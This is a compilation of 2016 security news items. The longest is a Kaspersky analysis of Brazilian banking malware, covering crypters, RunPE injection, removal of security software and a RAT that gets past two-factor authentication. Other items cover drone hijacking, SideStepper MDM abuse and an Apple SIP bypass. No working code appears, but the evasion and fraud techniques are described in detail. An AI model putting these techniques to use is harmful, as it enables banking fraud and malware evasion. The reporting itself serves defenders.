The evolution of Brazilian Malware
2.4.2016 Zdroj: Kaspersky Virus

Brazilian malware continues to evolve day by day, making it increasingly sophisticated. If you want to know how the various malicious programs work nowadays, you can jump to the corresponding section here. Meanwhile, before that, we would like to show how the techniques used by Brazilian cybercriminals have changed, becoming more advanced and increasingly complex.

Taking a look at the wider picture we can see that the authors are improving their techniques in order to increase malware lifetime as well as their profits.

Some time ago, analyzing and detecting Brazilian malware was something that could be done pretty fast due to no obfuscation, no anti-debugging technique, no encryption, plain-text only communication, etc. The code itself used to be written in Delphi and Visual Basic 6, with a lot of big images inside making it a huge file, as well as poor exception handling where the process would regularly crash.

Nowadays, the scenario is not the same; the attackers are investing time and money to develop solutions where the malicious payload is completely hidden under a lot of obfuscation and code protection. They do still use Delphi and VB, but have also adopted other languages like .NET and the code quality is much better than before, making it clear to us that they have moved to a new level.

Let’s walk through some samples showing the difference between what we used to find a few years ago and the threats being delivered today.

What we used to find

Keylogger

In the beginning, the first samples used to steal banking information from customers were simple keyloggers, most of them using code publicly available with some minor customizations in order to log only specific situations. At the time it was sufficient since banking websites were not using any kind of protection against this threat.

 

Public keylogger source code

 

Code implemented on malicious binary

The code was pretty simple; it just used the function GetAsyncKeyState in order to check the state of each key and then logged it as necessary. Most of the keyloggers were not using any obfuscation to hide the targets, helping in the identification of such attacks.

 

Plaintext strings used to detect navigation

Phishing Trojan

After the banks introduced virtual keyboard to their systems, the use of keyloggers was no longer effective. To bypass these protections, the Brazilian bad guys started developing mouselogger malware and later Phishing Trojans.

This type of malware was using DDE (Dynamic Data Exchange) in order to get the current URL opened in the browser; this method still works nowadays, but most of these malicious programs have updated their code to use OLE Automation instead of DDE because it provides more advanced options.

 

Code using DDE to get URL information

After getting the current URL the malware just checks if the URL is in the target list. If found, the malware would show a phishing screen asking for banking information.

 

Phishing Trojan being shown inside Internet Explorer

At this time the malware was not using any kind of encryption or encoding – all strings were plaintext making the analysis easier.

 

Malware strings without any encryption/encoding

The stolen information is then sent to the attacker by email.

 

Email containing the stolen information

Hosts

In order to steal information without making it easy to identify a phishing Trojan they started redirecting users to malicious web pages by changing the hosts file to resolve the banking domain names to hardcoded servers. In this way, after infection it would be more transparent to the user increasing the chances of a successful attack.

 

Data written to the hosts file in order to redirect access

 

Code used to write data to host file

These types of attack were very effective at the time, while not all anti-malware vendors were able to identify and block them. We can still see some samples using host modifications, but they are not so effective anymore.

Anti-rootkit

At this stage they realized that anti-malware solutions and internet banking security plugins were making their work more difficult. They then started to focus their efforts on removing security solutions before running the malicious payload in order to increase the chances of a successful execution and to keep running on the infected machine for much longer.

Nothing could be better than using well known command line tools that already have this capability –and most of them are already whitelisted.

RegRun Partizan
This tool is a Native Executable which runs on system startup before the Win32 subsystem starts up. It is able to delete files and registry keys even if they are protected by Kernel mode drivers, since it is executed before the drivers are loaded to the system. The commands to be executed are specified on the .RRI file as shown below.

 

Partizan RRI script containing the list of files to remove

The Avenger
A Windows driver designed to remove persistent files and registry keys. The commands to be executed on the system are written to a script that will be read by the driver once it starts.

 

The Avenger GUI and script to delete security solutions

Gmer
Gmer is a well-known rootkit detector and remover with lots of functions to detect rootkit activities on the system as well as delete files by using its own device driver. As it has a command-line interface, it is easy to remove protected files.

 

BAT file using GMER’s killfile function to remove security solution

More details about banking Trojans using GMER to uninstall security software can be found in a separate blogpost.

Malicious Bootloader

After using anti-rootkits Brazil’s cybercriminals went deeper and started to develop their own bootloaders, tailored exclusively to remove the security solutions from user’s machine. The downloader is in charge of installing the malicious files and then rebooting the machine. After reboot the malicious bootloader can remove the desired files from the system.

Basically, the malware replaces the original NTLDR, the bootloader for Windows NT-based systems up to Windows XP, to a modified version of GRUB.

 

Modified GRUB loader acting as NTLDR

This loader will read the menu.lst file that points to the malicious files already installed on the system xp-msantivirus and xp-msclean.

 

Menu.lst file containing the parameters to execute malicious commands

When executed the malware will remove files related to security solutions and then restore the original NTLDR files that were previously renamed to NTLDR.old.

 

Commands executed to remove security modules and restore the original NTLDR

What we have nowadays

Automation

Most banks were using machine identification to prevent unauthorized attempts to perform operations using the stolen information. To bypass this the bad guys started performing the malicious operations from the infected machine, by using Internet Explorer Automation (formerly OLE automation) to interact with the page content.

The first samples using this type of attack were Browser Helper Objects (BHOs) that could detect a transfer transaction and then change the destination account, sending the money to the attacker instead of the real destination.

Later, the same method was heavily used in Boleto attacks, where they were using automation to get the inputted barcode and then replace it with the fraudulent one.

Since this method only works for Internet Explorer, the malware needs to force the user to access internet banking via that browser. Therefore, it implements a timer which checks if Firefox or Chrome is being used and then kills the process.

 

Code to avoid use of Chrome and Firefox

When an instance of IE is found, the malware will search for a tab instance in order to be able to read the window text and then to know which URL is being accessed.

 

Finding the tab handle and obtaining the URL being accessed

 

Search for target’s specific titles

As the automation will process the page structure, it needs to know if the victim is on the page to input the Boleto information. It installs a handle to the event OnDocumentComplete in order to collect the full URL as soon as it is loaded and then checks if the user is on the target page.

 

Search for target’s specific pages

After confirming that the user is on the target page, the malware will process the page structure and install a handler to the submit button, then it can take control of the execution right after the user has submitted the page and then process the inputted content.

 

Search for a specific textbox and get the inputted data

After collecting the inputted data, it can be processed and then changed to the malicious content before submitting the page.

For those samples we could find, string obfuscation, debugger detection and virtual machine detection as well as this method mean they are not as easy to detect as other attacks involving phishing Trojans and hosts.

Code Obfuscation and RunPE

Looking for new ways to bypass detection, Brazilian criminals started using obfuscation in order to hide the parts of code that perform their main operations.

In the code below the coder has encrypted the original code of the function used to download the malicious payload; on a static analysis you cannot figure out what the purpose of this function is.

 

Encrypted downloader function

In runtime the malware will call the function to decrypt this code prior to executing it.

 

Decrypt code call

 

Decryption routine

As we can see in the code above, the decryption is a simple sub operation using the key 0x42 on the encrypted byte – a simple and fast way to hide parts of code.

 

Decrypted downloader function

In order to avoid detection by a network firewall, the downloaded file is encrypted using its own encryption function.

 

Encrypted file

 

Decrypted file

The encryption function is also hidden by using the same method used in the download function – after decrypting the code we can find a XOR-based encryption combined with a shift-right operation on the XOR key.

 

After decrypting the file, it will not be executed using the normal methods usually found in malicious code. To hide the process on the machine the malware uses a trick known as RunPE where the code will execute a clean process (like iexplorer.exe or explorer.exe) in a suspended state and then modify its memory content to the malicious code and execute.

 

Code launching clean process as suspended state

After creating the process in a suspended state the code will write the new code to the memory space, set the new EIP for execution and then resume the thread.

 

Writing malicious code and resuming the thread

 

Internet explorer process hosting the malicious file

Since the malicious code is running on the memory space allocated to Internet Explorer, using tools like Process Explorer to verify the publisher signature does not work because they check the signature of the process on the disk.

It was clear that they had moved on completely from using beginner’s code to a much more professional development and we realized it was time to update the analysis process for Brazilian malware. We are sure most of this evolution happened due to contact and the exchange of knowledge with other malware scenes, mostly those in Eastern Europe, which we described in this article.

AutoIt Crypto

AutoIt is now often used as a downloader and crypto for the final payload in order to bypass detection. After being compiled the AutoIt script is encrypted and embedded to the generated binary which makes it necessary to extract the original script before analyzing its code.

Looking for a better way to hide the final payload, the Brazilian cybercriminals have developed a new crypto using AutoIt language where the decrypted payload is executed by using a RunPE technique.

 

AutoIt Crypto execution flow

The crypto uses two different methods to store the encrypted file: the first one is by using the FileInstall function that already exists on AutoIt, and the other one is embedding the file at the end of the binary.

When using the second method the crypto writes a key which is used to mark where the encrypted payload content starts and is then able to find the content to decrypt. On the sample below, the key used is a short version of “Sei que ganharei 20K” which means “I know that I will win R$ 20,000”.

 

Key used to mark where the encrypted payload starts

 

AutoIt Crypto main code

After reading the encrypted payload it decrypts the content using the decryption key “VENCIVINICI” and then executes the malicious payload using RunPE.

The decryption function code is not written in AutoIt – it is written in C language. After being compiled the bytes are included in the code as a string and then mapped to memory and executed by using CallWindowProc API.

 

Decryption function implementation

We found the following algorithms being implemented as the encryption/compression method for this crypto:

RC4
XXTEA
AES
LZMA
ZLIB
The use of AutoIt for malware development is not something new, but in the middle of 2014 we saw a wave of attacks using AutoIt in Brazil, as we can see on the graph below.

 

Trojan.Win32.Autoit: number of users attacked in Brazil

MSIL Database

Another type of malware that emerged recently was malware developed in .NET instead of Visual Basic 6.0 and Delphi, following a trend we saw worldwide. It is not hard to find a downloader written in .NET. Anyway, some samples of Trojan-Banker.MSIL.Lanima grabbed our attention when we found some of them were not using functions commonly used to download the payload.

 

Download function

As we can see in the picture above this samples does not use any download function because it uses SQL Server to host the binary content and then just uses an SQL command to retrieve the content and save to disk.

The strings are encoded with base64 and encrypted with Triple DES algorithm in order to hide the text related to the main actions of the malware.

 

Decrypt function

This family of malware is very prevalent in Brazil and China:

 

MSIL Crypto

Following the same method used by AutoIt Crypto the bad guys developed another crypto, this time using .NET language. The process to extract the real executable is almost the same as AutoIt Crypto but it has an intermediate module which is responsible for extracting the final payload.

Looking at the main module we have a .NET code and the main function of this main module is to extract and load the embedded DLL.

 

.NET Crypto execution flow

 

Crypto main function

As we can see, the function above will split the binary content by using the separator string “cdpapxalZZZsssAAA” and use the second block which contains the encrypted code of the Loader DLL.

 

Loader DLL encrypted content

Then it is time to decrypt it by calling the function named “fantasma” (or “ghost” in English), the official name used for this crypto in the forums is PolyRevDecrypt which is basically an XOR operation between the encrypted byte, the last byte of the encrypted buffer and one byte of the password provided to the function.

 

Decryption function

After being decrypted, the code will be loaded and executed by the function “docinho” (or “candy” in English).

 

Function to load and execute the DLL

The code of the library is almost the same as the main executable except that now it will use the second block of the split content.

 

Loader DLL main function

RAT

In a bid to reduce the losses related to cyber attacks, banks implemented two-factor authentication using a hardware token and SMS token for online banking transactions in addition to the solutions already in place like machine identification. To solve this problem the cybercriminals have created a remote administration tool specially developed to request the information required to process internet banking transactions.

 

RAT execution flow

The browser watcher will monitor the user browser and see if any of the target banks are accessed; if they are, it will decompress and execute the RAT Client and notify the C&C about the new infection.

 

Internet banking access monitoring

The strings used by this malware are encrypted using their own encryption routine. After decrypting it we are able to identify the targets as well as the important parts of the code.

 

Decrypted strings

For this type of infection it is common for the bad guys to create a way to manage the attacks. Here we can see the number of computers infected on the same day, keeping in mind that this number means the amount of users that have accessed internet banking while the malware was running on their computer.

 

C&C panel showing the list of infected users

The RAT Client will connect to the server to alert the attacker that a new victim is accessing the internet banking system. It is then possible to execute the attack in real time.

 

RAT Server showing a new victim is connected

At this stage the attacker just needs to wait for the user to login and then proceed with the attack. When the user is already logged in, the attacker can see the user screen, lock it and control the execution as well as ask for specific information that will help him to steal the account, like:

Token
Access card code
Date of birth
Account password
Internet banking password
Electronic signature
To prevent the user from seeing that the computer is being remotely controlled, this RAT has a function that simulates an update for the bank security plugin showing a progress bar and disabling all user interactions. Meanwhile, the attacker can perform the banking operations by using the active browser section because the overlay screen is not shown to the attacker.

 

Lock screen simulating an update

If some information is requested to confirm the transaction, e.g. SMS token, the attacker can ask the victim who will think the information is necessary in order to proceed with the update process.

 

Screen asking for token code

As soon as the user provides the information, the attacker can enter it on the internet banking screen, bypassing the 2FA used in the transaction.

 

Information received from the victim

Ransomware

Brazilian cybercriminals not only work with banking malware – they are also exploring other types of attacks involving ransomware. Some years ago, we found TorLocker which contains details inside the malware code suggesting that the developer is from Brazil.

 

Code containing some strings suggesting the author is from Brazil

As we can see in the image above, we found the sentence highlighted in blue: “Filho de Umbanda não cai!” (“Umbanda’s son never falls down”). Umbanda is an unorthodox religion in Brazil. The name marked in red is the nickname of the author and it also uses the extension .d74 for the encrypted files. This user is very active on underground forums looking for malicious services in Brazil.

We also found other references, like the use of a service in Brazil to get the victim IP in order to notify about an infection.

 

Request to a Brazilian service to obtain the victim IP

Some months ago, we found another ransomware program based on the Hidden Tear source code that was modified to target Brazilian users, differing from the initial program that was found targeting English- and Japanese-speaking users.

 

Victim’s machine showing messages in Portuguese, asking to pay in order to receive the files

Why they evolve

We have sufficient evidence that Brazilian criminals are cooperating with the Eastern European gangs involved with ZeuS, SpyEye and other malware created in the region. This collaboration directly affects the quality and threat level of local Brazilian malware, as its authors are adding new techniques to their creations and getting inspiration to copy some of the features used in the malware originating from Eastern Europe. Brazilian cybercriminals are not only developing the quality of their code but also using the cybercrime infrastructure from abroad.

We saw the first sign of this ‘partnership’ in the development of malware using malicious PAC scripts. This technique was heavily exploited by Brazilian malware starting in 2011 and was later adopted by Russian banking Trojan Capper. This cooperation continued as Brazilian criminals started to use the infrastructure of banking Trojans from Eastern Europe – the Trojan-Downloader.Win32.Crishi was the first to use DGA domains hosted at bulletproof companies from Ukraine. Also the Boleto malware adopted the massive usage of fast flux domains, aiming to avoid the takedown of C2s – we saw that with the “bagaça” (bagasse in Portuguese) domains, registered using anonymous services, which hosted crimeware and boleto stuff and was resolving different IPs for every request.

 

The “bagaça” domains: fast flux and bulletproof from Eastern Europe

Other strong signs of their cooperation are the constant presence of Brazilian cybercriminals on Russian or Eastern European underground forums. It’s not unusual to find Brazilian criminals on Russian underground forums looking for samples, buying new crimeware and ATM/PoS malware, or negotiating and offering their services. The results of this cooperation can be seen in the development of new techniques adopted in Brazilian malware.

 

The Brazilian malicious author of TorLocker negotiating in a Russian underground forum

These facts show how Brazilian cybercriminals are adopting new techniques as a result of collaboration with their European counterparts. We believe this is only the tip of the iceberg, as this kind of exchange tends to increase over the years as Brazilian crime develops and looks for new ways to attack businesses and regular people.

Conclusion

Cybercrime in Brazil has changed drastically in the last few years, as it shifted from simple keyloggers built from public source code to tailored remote administration tools that can run a complete attack by using the victim machine.

Malware that used to show a phishing screen as soon as it was executed is now completely reactive and waits for a valid session in order to start the job.

That means that the criminals are investing much more money and time in order to develop their malicious code, enhancing anti-debugging techniques and then running the malware undetected for much longer.

As we know, they are in touch with cybercriminals from Eastern Europe, mainly Russians, where they exchange information, malware source code and services that will be used in Brazilian attacks. We can see that many of the attacks used in Brazil were first seen in Russian malware as well as Brazilian techniques later being used in Russian attacks.

Based on that, we can expect to find Brazilian malware with enhanced code obfuscations, anti-debugging tricks, encryption algorithms and secure communications making our work much harder than now.


Bezpečnostní experti varují před zlodějským virem. K šíření nepotřebuje internet

1.4.2016 Viry
Nový škodlivý virus, který krade uživatelská data, odhalili bezpečnostní experti antivirové společnosti Eset. Nezvaný návštěvník dostal přezdívku USB Thief, protože se šíří především prostřednictvím flashek a externích pevných disků. Nakazit tak dokáže i stroje, které nejsou připojeny k internetu. Útočník jim jednoduše infikované médium podstrčí.
Nový nezvaný návštěvník se nejčastěji šíří přes USB flashky a externí disky.

Nový nezvaný návštěvník se nejčastěji šíří přes USB flashky a externí disky.
USB Thief potřebuje pro svou „špinavou“ práci pouze pár volných megabajtů na výměnném médiu, které se připojuje k počítači prostřednictvím USB portu. Na něm pak číhá do doby, než bude moci napadnout nějaký počítač.

Snaží se tedy zůstat co možná nejdéle maskován, aby minimalizoval riziko odhalení. Zajímavé je, že se po připojení k počítači automaticky nespustí, jako tomu bývá zpravidla o podobných škodlivých kódů.

Společně s neškodnými programy vpustí do počítače virus USB Thief.
Místo toho se naváže na tzv. portable aplikace, které často bývají uloženy právě na flashkách a externích pevných discích. Jde v podstatě o programy, které se nemusejí instalovat – spouští se přímo z USB médií.

Uživatelé je zpravidla používají na počítačích, kde nemají oprávnění k instalování aplikací. Tím, že portable aplikace nepotřebují instalovat, mohou lidé snadno obejít restrikce administrátorů, typicky na počítačích v kanceláři. Jenže společně s neškodnými programy vpustí do počítače virus USB Thief.

Antiviry jsou prý bezradné
Ten pak automaticky začne z připojeného PC krást data a ukládat je v zašifrované podobě na externí disk. Vzhledem k tomu, jak nezvaný návštěvník opatrně pracuje, většina antivirových programů má problémy s jeho identifikací. Jeho případné odhalení zkrátka není vůbec snadné.

Aby se útočník k datům dostal, musí získat flashku nebo externí disk zase zpět. USB Thief tak nejčastěji šíří počítačoví piráti, kteří své oběti podstrčí infikované médium. Uživatelé by tak měli být ostražití před používáním USB úložišť, jejichž původ je pochybný. Tím výrazně minimalizují riziko, že je nový virus připraví o jejich data.

Je pravděpodobně ale jen otázkou času, než se začne šířit sofistikovanější obdoba tohoto záškodníka, která se také bude šířit přes USB média, ale nashromážděná data bude schopná posílat zpět útočníkovi i přes internet. Pak už útočník nebude potřebovat dostat médium zpět, ale bude jen čekat, až mu virus naservíruje uživatelská data jak na zlatém podnose i na dálku.


Hacker Hijacks a Police Drone from 2 Km Away with $40 Kit
1.4.2016

A researcher has demonstrated how easy it is to steal high-end drones, commonly deployed by government agencies and police forces, from 2 kilometres away with the help of less than $40 worth of hardware.
The attack was developed by IBM security researcher Nils Rodday, who recently presented his findings at Black Hat Asia 2016.
Hacking the $28,463 Drone with Less than $40 of Hardware
Rodday explained how security vulnerabilities in a drone's radio connection could leverage an attacker (with some basic knowledge of radio communications) to hijack the US$28,463 quadcopters with less than $40 of hardware.
Rodday discovered (PPT) two security flaws in the tested drone that gave him the ability to hack the device in seconds.
First, the connection between drone's controller module, known as telemetry box, and a user’s tablet uses extremely vulnerable 'WEP' (Wired-Equivalent Privacy) encryption – a protocol long known to be 'crackable in seconds.'
Also Read: Police Training Eagles to Take Down Rogue Drones
This flaw could be exploited by any attacker in Wi-Fi range of 100 meters to break into that connection and send a malicious command that disconnects the drone's owner of the network.
Second, the onboard chips used for communication between that telemetry module and the drone uses even less-secured radio protocol.
Hijacking Drones from 2 Kms Away
Hacker Hijacks a Police Drone from 2 Km Away
The module and drone communicate using 'Xbee' chip, created by the Minnesota-based chipmaker Digi International and is commonly used in unmanned aerial vehicles (UAVs) everywhere.
According to Rodday, Xbee chips do have built-in encryption capabilities, but for avoiding latency between the drone and the user's commands, the chips doesn't implement encryption.
This issue leaves the drones open to 'Man-in-the-Middle' (MitM) attacks, leveraging an attacker to intercept everything happening on the UAVs network connection and inject commands between the drone and the telemetry box from up to 2 kilometres away.
Also Read: Anti-Drone Weapon that Shoots Down UAVs with Radio Waves
Furthermore, Rodday also warned that any sophisticated hacker with the ability to reverse engineer the drone's software would be able to send navigational controls, block all commands from the real operator, or even crash it to the ground.
Rodday's research proves that there are critical issues with what's likely the most expensive drone yet, as well as one that is used for more serious purposes than high-altitude selfies, which needs to be considered seriously.


The dangerous interaction between Russian and Brazilian cyber criminal underground
1.4.2016 Hacking

Kaspersky has analyzed the interaction between the Russian and Brazilian criminal underground communities revealing a dangerous interaction.
In the past weeks, we have analyzed the evolution of cyber criminal communities worldwide, focusing on illicit activities in the Deep Web. To simplify the approach we have considered the principal cyber criminal communities (Russia, Brazil, North America, Japan, China, Germany) as separated entities, instead, these ecosystems interact each other in a way that Kaspersky experts have analyzed.

Experts from Kaspersky Lab have analyzed the interaction between the Russian and Brazilian criminal communities, a dangerous interaction that is leading to a rapid evolution of hacking tools.

The experts at Kaspersky Lab demonstrated that Brazilian and Russian-speaking criminals have an intense cooperation, Brazilian criminals use to buy malware samples from the Russian peers operating the principal underground forums. Typically they pay for exploit kits, ATM or PoS malware and also hacking services.

The first example of collaboration is dated back 2011, when Brazilian cyber criminals have been actively abusing malicious PAC scripts to redirect victims to phishing pages. A few months later, cyber criminals behind the Russian banking Trojan Capper adopted the same technique.

“We saw the first sign of this ‘partnership’ in the development of malware using malicious PAC scripts. This technique was heavily exploited by Brazilian malware starting in 2011 and was later adopted by Russian banking Trojan Capper. ” states the analysis published by Kaspersky.

Russian Brazilian underground

The experts highlight that cooperation runs both ways, helping to speed up the growth of hacking capabilities of both communities and also malware evolution.

“As we know, they are in touch with cybercriminals from Eastern Europe, mainly Russians, where they exchange information, malware source code and services that will be used in Brazilian attacks. We can see that many of the attacks used in Brazil were first seen in Russian malware as well as Brazilian techniques later being used in Russian attacks.” continues Kaspersky.

The researchers collected evidence of the profitable collaboration, in one discussion thread on an underground forum frequented by Russian hackers a user behind the moniker “Doisti74” expressed his interest in buying compromised machines located in Brazil. The same user is present in the Brazilian underground scene and researchers believe he could be interested in launching malware-based campaign in Brazil.

Brazilian crooks are looking with increasing interest at ransomware, some years ago experts at Kaspersky discovered the threat TorLocker developed by Brazilian malware developers. Some months ago, Kaspersky has spotted another ransomware based on the Hidden Tear source code that was adapted to target Brazilian users.

Crooks belonging to the two criminal underground communities also use to share malicious infrastructure, this is the case of a number of Boleto malware campaigns observed in Brazil that were relying on the same infrastructure used months before by operators behind the Russian banking Trojan family (Crishi).

The researchers have illustrated in details numerous evidence they collected related to the collaboration between Russian and Brazilian hackers, the experts highlighted that Brazilian banking malware has rapidly evolved in the last years thanks to this interaction.

“Just a few years ago, Brazilian banking malware was very basic and easy to detect,” said Thiago Marques, security researcher at Kaspersky Lab.

“With time, however, the malware authors have adopted multiple techniques to avoid detection, including code obfuscation, root and bootkit functions and so on, making their malware much more sophisticated and harder to combat.

“This is thanks to malicious technologies developed by Russian-speaking criminals. And this cooperation works both ways.”

I have no doubt, cybercrime has no boundaries and this kind of interaction will reinforce the principal criminal underground communities.


Do hackers have hacked election to make Peña Nieto President?
1.4.2016 Hacking

A Columbian hacker claims he helped the candidate Enrique Peña Nieto in winning the Mexican presidential election in 2012.
Until now we have seen something of similar only in the TV series, but the reality could overwhelm the fiction because a Columbian hacker claims he helped Enrique Peña Nieto in winning Mexican presidential election.

The hacker named Andrés Sepúlveda revealed to have operated in a team with peers to install a malware to monitor opponents during the 2012 campaign as part of a hacking campaign codenamed ‘black propaganda.’

The hackers helped Enrique Peña Nieto win Mexico’s 2012 presidential election, they manipulated the event it in nine countries across Latin America. The hackers have installed malware with the intent to spy on target machines and steal data, they also used a botnet to manage PSYOPs on the social media trying to influence the final decision of the voters.

Enrique Pena Nieto

The hacker, who is currently serving a 10-year prison sentence for hacking crimes related to Colombia’s 2014 presidential election, released an interview to Bloomberg explaining that he was hired by the Miami-based political consultant Juan José Rendón.

“My job was to do actions of dirty war and psychological operations, black propaganda, rumors—the whole dark side of politics that nobody knows exists but everyone can see” the man told to Bloomberg.

Sepúlveda added that his primary motivation was political, he hacked in opposition to what he defined “dictatorships and socialists governments.”

The political consultant Juan José Rendón denied to have hired Sepúlveda for illegal activities and confirmed that he paid him in 2005 for the development of a web site.

“He is delusional,” Rendón said in a phone call. “All the things he describes are exactly like the TV show Mr Robot.”

“Can you really change the will of the people through social networks? Maybe in Ukraine or Syria where there is no alternatives. But here (in the Americas) where there is TV, a free press and door to door campaigns, it is not so influential,” he added.

Sepúlveda confirmed to have had a $600,000 budget to undermine the presidential campaigns Nieto’s opponents, Josefina Vázquez Mota and Andrés Manuel López Obrador.

The hacker team compromised computers at the headquarters of the two candidates in order to monitor communications and exfiltrate sensitive data, including speech drafts and campaign schedules.

They also managed a PSYOP through the principal social networks by using a multitude of fake Twitter accounts to fuel the public debate on the Peña Nieto’s political plan and discrediting his rivals, all these accounts were carefully managed in a way to appear legitimate.

“He wrote a software program, now called Social Media Predator, to manage and direct a virtual army of fake Twitter accounts. The software let him quickly change names, profile pictures, and biographies to fit any need. Eventually, he discovered, he could manipulate the public debate as easily as moving pieces on a chessboard—or, as he puts it, “When I realized that people believe what the Internet says more than reality, I discovered that I had the power to make people believe almost anything.”” reported Bloomberg.

Sepúlveda confirmed to have used a strategy similar to the ‘black propaganda’ in order to influence the opinion of voters in other elections in several countries, including Venezuela, Nicaragua, Panama, Honduras, El Salvador, Colombia, Costa Rica and Guatemala.

Unfortunately, the man has destroyed most of the evidence of his support to the politic candidates in various presidential campaigns.

Which is the Peña Nieto’s position?

The Office of the President issued the following statement:

“We reject any relationship between the 2012 presidential campaign team and Andrés Sepúlveda or that there was a contract with the consultant J.J. Rendón.”


Just One? No, FBI to Unlock More iPhones with its Secret Technique
1.4.2016  Apple
The Federal Bureau of Investigation (FBI) worked with Israeli mobile forensic firm Cellebrite to unlock iPhone used in the San Bernardino shooting last year, confirmed by multiple sources familiar with the matter.
The United States Department of Justice (DoJ) said on Tuesday that the FBI successfully unlocked iPhone and accessed data with the help of an undisclosed alternative method offered by a third party and that it no longer needs Apple's assistance.
Apple was engaged in a legal encryption battle with the DoJ for a month over a court order that forces the company to write new software, which could disable passcode protection on Farook's iPhone 5C to help them access data on it.
Apple refused to comply with the order, saying the FBI wants the company to create the "software equivalent of cancer" that would likely threaten the privacy and data security of millions of its iPhone users.
FBI to Unlock iPhone in Several Pending Cases
Although the legal battle between the FBI and Apple is over, the 'encryption vs. national security' drama is still ongoing.
Apple to FBI: Reveal Your Secret Technique

Apple asked the FBI to share its exploit that bypassed the iPhone security protections, but the agency, which has already been frustrated in convincing Apple to help it access data on just one iPhone, might prefer to keep its technique secret.
Now, when the FBI itself owns a cancerous software, the agency would most likely use it to resolve several pending court cases in which the Feds were seeking Apple's assistance to access information from a locked iPhone.
Yes, the FBI is keeping its technique secret… but only from Apple and not from other law enforcement agencies seeking details on the method to access locked iPhones involved in criminal cases.
Currently, there are two separate court cases, one in Arkansas and the other in Brooklyn, seeking help from the FBI.
Case 1: Reportedly, the FBI agreed to help the Police in Arkansas in the homicide case by unlocking an iPhone and iPod belonging to two teens accused of killing a couple.
Case 2: In the Brooklyn case, an iPhone 5S was seized in the course of a drug investigation, which runs iOS 7. The DoJ will disclose by April 11 as to whether it would "modify" its own request for Apple's assistance in this case or will unlock itself.
Apple's Biggest Problem: How FBI hacked its iPhone
It's still a question, but since the agency so desperately wanted an iPhone backdoor, it seems that it will not share with Apple after having one.
Apple is now in the uncomfortable position as the company knows that a critical vulnerability exists in its operating system, but don't know what it is.
The situation becomes serious for Apple where the company knows the FBI has no legal obligation to disclose how it broke the iPhone's security.
However, the government could argue the technique is bound by a non-disclosure agreement with the third party that unlocked the iPhone.
Though it's not just Apple who had been approached several times to help Feds unlock iPhone, Google had also been asked, at least, nine times to help federal agencies hack into locked Android smartphone citing the All Writs Act.


SideStepper method allows to infect iOS devices via MDM Solutions
1.4.2016 Apple

SideStepper is a method to install malicious apps on iOS devices by abusing the mobile device management (MDM) solutions.
Security researchers from the Check Point firm have devised a method to install a malicious code on iOS devices by abusing the mobile device management (MDM) solutions used by many enterprises.

The technique relies on a vulnerability dubbed by the experts SideStepper, but that Apple considers it as a normal behavior.

“SideStepper is a vulnerability that allows an attacker to circumvent security enhancements in iOS 9 meant to protect users from installing malicious enterprise apps. These enhancements require the user to take several steps in device settings to trust an enterprise developer certificate, making it harder to install a malicious app accidentally.” state the blog post published by Check Point.

Apple allows enterprises to distribute internally-used apps through a Developer Enterprise Program instead passing through the App Store. In order to install the apps, enterprises need to use certificates signed by Apple.

The program allows organizations to install internal apps on employee devices using enterprise certificates signed by Apple.

However, hackers have abused in several circumstances of digital certificates so Apple introduced new security enhancements in iOS 9.

“These enhancements require the user to take several steps in device settings to trust an enterprise developer certificate, making it harder to install a malicious app accidentally.” States the CheckPoint firm.

SideStepper technique

MDM solutions are used by enterprises to easily manage mobile devices used by employees. MDM allows the easy management of any aspect of the mobile devices, including installing apps, deployment of security policies, and remotely wipe phones.

Experts at CheckPoint firm highlighted that threat actors can launch a man-in-the-middle (MitM) attack against the MDM solution to allow the installation of malicious enterprise apps over-the-air, this is possible because Apple gives apps installed using MDMs the possibility to bypass security measures.

Malicious MDM-distributed apps can be abused by using the following process:

Install a malicious iOS configuration profile. This is a native way to distribute a set of configuration settings like networking, security settings, root CAs, and more. A threat actor can craft a configuration profile that will install a root CA and route traffic through a VPN or a proxy to a malicious server, and then initiate a MitM attack. This configuration could be deployed using phishing attack.
Set up a remote enterprise app server to serve the malicious app.
Wait for a command to be sent to an iOS device by an MDM: then, using a MitM attack, intercept and replace the command with a request to install a malicious app. The iOS device will fetch from the remote enterprise app server and install it.
Execute commands using the malicious enterprise app which, because of the method used to install it, does not require explicit user trust. This means that users will not be able to distinguish between a legitimate enterprise app, an App Store app, or a bogus app installed by a threat actor.
Basically, the attackers could intercept the command sent by the MDM to the devices and replace it with a request to install a malicious app. The operation doesn’t need user’s interaction making hard to discover the attack.

The SideStepper technique could be used to infect Apple devices and control them with a malicious code.

CheckPoint suggests enterprises to carefully assess the risk of malicious applications on mobile devices.

Experts from CheckPoint will present the SideStepper method at the Black Hat Asia conference Today.


The code to bypass Apple System Integrity Protection security mechanism fits in a Tweet

31.3.2016 Apple

Apple failed in fixing the System Integrity Protection security mechanism and the exploits code released by a researcher fits in a Tweet .
Last week security media reported a critical privilege escalation flaw (CVE-2016-1757) in the Apple System Integrity Protection (SIP) security mechanism, a vulnerability that was present at the time of the discovery in all the version of the OS X operating system.

This week, Apple issued a security update of OS X El Capitan 10.11.4 and iOS 9.3 to solve the problem, but according to the experts is was ineffective in fixing the privilege escalation vulnerability.

The flaw was discovered by the security researcher Pedro Vilaça from SentinelOne and exposes more than 130 Million Apple customers at risk of hack. The attackers can exploit the flaw for various purposes, for example, the vulnerability could be exploited in a multi-stage attack in which crooks have already compromised the target system and use the flaw to gain persistence on compromised devices.

The SIP is a security mechanism implemented by Apple in the OS X El Capitan operating system for the protection of certain system processes, files and folders from being modified or tampered with by other processes, even when they are executed by a user with root privileges.

System Integrity Protection SIP bypass OS X El Capitan
According to the experts at SentinelOne the flaw allows circumventing the SIP technology bypassing the key security feature without kernel exploits. Now Apple issued a security patch for both OS X El Capitan 10.11.4 and iOS 9.3, but it seems that the update is ineffective, causing the users’ disappointment.

The critical privilege escalation vulnerability in the System Integrity Protection still affects the most recent version of OS for both Macs and iThings.

The popular researcher Stefan Esser, has published a new exploit code to bypass latest patched version of the System Integrity Protection application, and the interesting part is the dimension of the code that fits in a Tweet.

You’ve heard it right, according to the Esser this isn’t the unique flaw affecting the SIP, and most of them are still unfixed.
“Stefan Esser of German security biz SektionEins also gave a talk at this year’s SyScan360 during which he highlighted a bunch of SIP-related vulnerabilities. Esser told The Register “everything in my slides is unfixed” by Apple in the latest version of OS X 10.11 except for two flaws: the kas_info syscall and a malicious mount.” reported El Reg.

“The evil mount worked by mounting a file system over /System and replacing supposedly SIP-protected core OS utilities with attacker-controlled ones (yes, that really worked). It was fixed in OS X 10.11.2. “

